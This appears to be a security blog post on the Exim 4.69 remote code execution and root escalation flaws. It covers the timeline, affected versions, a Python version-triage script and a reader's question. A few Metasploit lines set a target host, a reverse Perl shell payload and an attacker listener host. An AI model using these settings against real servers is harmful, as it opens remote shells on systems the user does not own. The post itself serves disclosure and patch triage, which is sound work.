Vulnerability discovered on 2010-12-07 by Sergey Kononenko
Vulnerability confirmed on 2010-12-10 by David Woodhouse
Exploit released on 2010-12-10 by hdm & jduck
Vulnerability corrected on 2008-12-02, but not identified as a vulnerability for 2 years! So the fix was not carried into most OS distributions.
PoC provided by:
Affected version(s):
Versions up to and including 4.69, depending on the distribution's versioning
Tested on Debian Lenny 5.0 with:
dpkg -l | grep exim4
Two vulnerabilities, exploited for two years, have been discovered in the Exim MTA. Sergey Kononenko, an employee of a Ukrainian company, unwittingly discovered a vulnerability in the Exim4 mail server while investigating a compromise of its IT infrastructure; it had been exploitable for two years!
This vulnerability was reported to the Exim maintainers on December 7, and the rumor quickly spread. It took no more than three days for Rapid7 researchers, authors of the Metasploit pen-testing framework, to develop a working PoC that affects most Exim installations on all platforms (Debian, Ubuntu, Red Hat, CentOS, etc.).
At the same time, not one but two vulnerabilities were discovered. The first, CVE-2010-4344, permits remote arbitrary code execution with the privileges of the user running the Exim mail software. The second, CVE-2010-4345, allows escalation of privileges from the user running the Exim mail software to the superuser, root.
It is interesting to see that the first vulnerability was corrected on December 2, 2008, but this correction was not marked as a vulnerability fix. Because of this lack of communication, the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) shipping Exim were not warned of the vulnerability, and so the hidden vulnerability was never patched until now.
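As an added check that is not part of the original post: a small Python script that reads the output of `dpkg -l | grep exim4` (the package names and versions below are constructed samples) and flags packages whose upstream version is 4.69 or older, comparing version components numerically so that 4.69 and 4.70 sort correctly. It assumes Debian-style `epoch:upstream-revision` version strings and only tells you which packages need confirming against the distribution's advisory, since a distribution may backport the fix without raising the upstream number.

```python
import re

# Constructed sample of `dpkg -l | grep exim4` output on a Debian Lenny box;
# the package list and versions are illustrative, not taken from the post.
SAMPLE_DPKG_OUTPUT = """\
ii  exim4                 4.69-9   metapackage to ease Exim MTA (v4) installation
ii  exim4-base            4.69-9   support files for all Exim MTA (v4) packages
ii  exim4-config          4.69-9   configuration for the Exim MTA (v4)
ii  exim4-daemon-light    4.69-9   lightweight Exim MTA (v4) daemon
"""

# The post states that versions up to and including 4.69 are affected.
LAST_AFFECTED_UPSTREAM = (4, 69)


def parse_debian_version(version: str):
    """Split 'epoch:upstream-revision' into (epoch, upstream_tuple, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, _, revision = version.partition("-")
    # Numeric components only, so (4, 69) < (4, 70) even though "4.69" > "4.70"
    # as plain strings.
    upstream_tuple = tuple(int(p) for p in re.findall(r"\d+", upstream))
    return epoch, upstream_tuple, revision


def triage_exim_packages(dpkg_output: str):
    """Map each installed exim4 package to its version and a triage status.

    'check' means the upstream version is within the affected range and the
    installed Debian revision must be confirmed against the distribution's
    advisory; 'newer' means the upstream version is past 4.69.
    """
    results = {}
    for line in dpkg_output.splitlines():
        fields = line.split()
        # Only fully installed packages ('ii') from the exim4 family matter.
        if len(fields) < 3 or fields[0] != "ii" or not fields[1].startswith("exim4"):
            continue
        name, version = fields[1], fields[2]
        _, upstream, revision = parse_debian_version(version)
        status = "check" if upstream <= LAST_AFFECTED_UPSTREAM else "newer"
        results[name] = {"version": version, "revision": revision, "status": status}
    return results


if __name__ == "__main__":
    for pkg, info in triage_exim_packages(SAMPLE_DPKG_OUTPUT).items():
        print(f"{pkg:<22} {info['version']:<10} {info['status']}")
```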
dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
1 thought on “exim 4.69 remote code execution”
Does this exploit have to be run locally? I mean on the same network? I ask because of those IPs! 192.168.172.* . Can I use this exploit via the internet?
Thanks and sorry. I'm a newbie.